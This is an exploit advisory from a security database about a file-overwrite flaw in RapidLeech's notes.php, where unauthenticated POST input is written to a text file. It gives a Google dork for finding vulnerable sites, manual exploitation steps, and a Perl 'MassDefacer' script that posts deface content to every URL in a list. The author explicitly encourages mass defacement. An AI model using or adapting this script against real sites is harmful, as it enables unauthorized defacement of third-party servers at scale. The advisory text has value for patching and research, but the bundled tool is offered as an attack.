RapidLeech Local File Edit Vulnerability

2013.04.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

[+] Author: Iranian_Dark_Coders_Team [+] Home: WwW.IDC-TeaM.NeT [+] Exploit Title: RapidLeech Local File Edit Vulnerability [+] Date: 04-02-2013 [+] Category: WebApp [+] Google Dork: intitle:"Rapidleech v2 rev. 42" - inurl:"index.php?debug=1" [+] Tested on: Ubuntu 12.10 [+] Discovered By : M.R.S.CO ################################## source of bug : var/www/notes.php if (isset($_POST['notes']) && $_POST['notes']) { file_put_contents("files/".lang(327).".txt",$_POST['notes']); } ################################## vulnerability Concept: file_put_contents() + $_POST['notes'] = Local File Edit ################################## 1 . start 2 . go to http://site.com/notes.php 3 . Write Your text in TextArea 4 . now you can view your text in this path http://site.com/files/notes.txt or http://site.com/files/Notes.txt 5 . end or you can help from this exploit for mass deface rapidleech websites ################################## ##start perl code #RapidLeech MassDefacer #Coded By M.R.S.CO #We Are M.R.S.CO,N3O,UB313 #Friends : G3n3Rall,BlacK.King,Nafsh,b3hz4d,Black.Hack3r use HTTP::Request::Common qw(POST); use LWP::UserAgent; $ua = LWP::UserAgent ->new; $ua->timeout(15); system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print q ( ------------------------------ | Iranian Dark Coders Team | ------------------------------ | WwW.IDC-TeaM.NeT | ------------------------------ | Coded BY M.R.S.CO | ------------------------------ Usage : perl idc.pl urls_file Deface_file Example : perl idc.pl urls.txt def.txt ); if($ARGV[1]) { open(file1, $ARGV[1]) || print "Couldn't open ".$ARGV[1]."\n"; my @f =<file1>; open(file, $ARGV[0]) || print "Couldn't open ".$ARGV[0]."\n"; my @tt =<file>; foreach $url(@tt){ chomp($url); $url1=$url."/notes.php"; my $req = POST $url1, [ 'notes'=> $f, 'submit'=> "Save+Notes" ]; $content = $ua->request($req)->as_string; print $url."/files/Notes.txt\n"; }} ##end perl code ##################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top